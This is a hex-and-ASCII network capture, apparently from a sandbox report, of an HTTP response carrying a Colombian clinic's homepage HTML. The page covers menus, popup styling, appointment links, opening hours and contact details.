                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6823INData Raw: 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70
                                                                                                                                                                                                                                                                          Data Ascii: tem-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="g-menu-item g-menu-item-type-comp
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6824INData Raw: 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 51 75 69 c3 a9 6e 65 73 20 73 6f 6d 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a
                                                                                                                                                                                                                                                                          Data Ascii: <li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-title">Quines somos </span></span>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6826INData Raw: 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 56 61
                                                                                                                                                                                                                                                                          Data Ascii: </span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-title">Va
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6827INData Raw: 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 73 75 62 6c
                                                                                                                                                                                                                                                                          Data Ascii: ">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g-subl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6828INData Raw: 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                          Data Ascii: tes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul></div></div></li></ul></li><li class="g-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6830INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 39 20 20 22 3e 0a 3c 61 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: s="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-399 "><a clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6831INData Raw: 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 39 20 20 22 3e 0a 3c 61 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-119 "><a cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6832INData Raw: 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 38 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61
                                                                                                                                                                                                                                                                          Data Ascii: -2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-menu-item-388 g-standard "><a class="g-menu-item-conta
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6834INData Raw: 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 2a 2f 0d 0a 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 2f 2a 70 6f 70 75 70 20 66 6f 6e 74 20 63 6f 6c 6f 72 2a 2f 0d 0a 62 6f 72 64 65 72
                                                                                                                                                                                                                                                                          Data Ascii: ox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background color*/color: rgba(0, 0, 0, 0);/*popup font color*/border
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6835INData Raw: 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 22 3e 3c 2f 64 69 76 3e 27 2c 0d 0a 09 09 09 09 77 72 61 70 20 20 20 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d
                                                                                                                                                                                                                                                                          Data Ascii: autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-overlay379"></div>',wrap : '<div class="gafancybox-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6836INData Raw: 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 22
                                                                                                                                                                                                                                                                          Data Ascii: aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img style="display: block; margin-left: auto; margin-right: auto;"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6838INData Raw: 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65 6e 64 61 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                                          Data Ascii: ng" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Agenda</a></div></div></div> </div></div></div></div></
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6839INData Raw: 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 33 2f 50 61 67 69 6e 61 5f 57 65 62 5f 31 2d 30 31 2e 6a 70 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: -block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src="/images/2023/Pagina_Web_1-01.jpg" alt="image" /><div clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6840INData Raw: 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20
                                                                                                                                                                                                                                                                          Data Ascii: e" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6842INData Raw: 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61
                                                                                                                                                                                                                                                                          Data Ascii: e center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoima
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6843INData Raw: 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64
                                                                                                                                                                                                                                                                          Data Ascii: iner"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6844INData Raw: 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d
                                                                                                                                                                                                                                                                          Data Ascii: <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6846INData Raw: 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d
                                                                                                                                                                                                                                                                          Data Ascii: lle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6847INData Raw: 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: "logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" cla
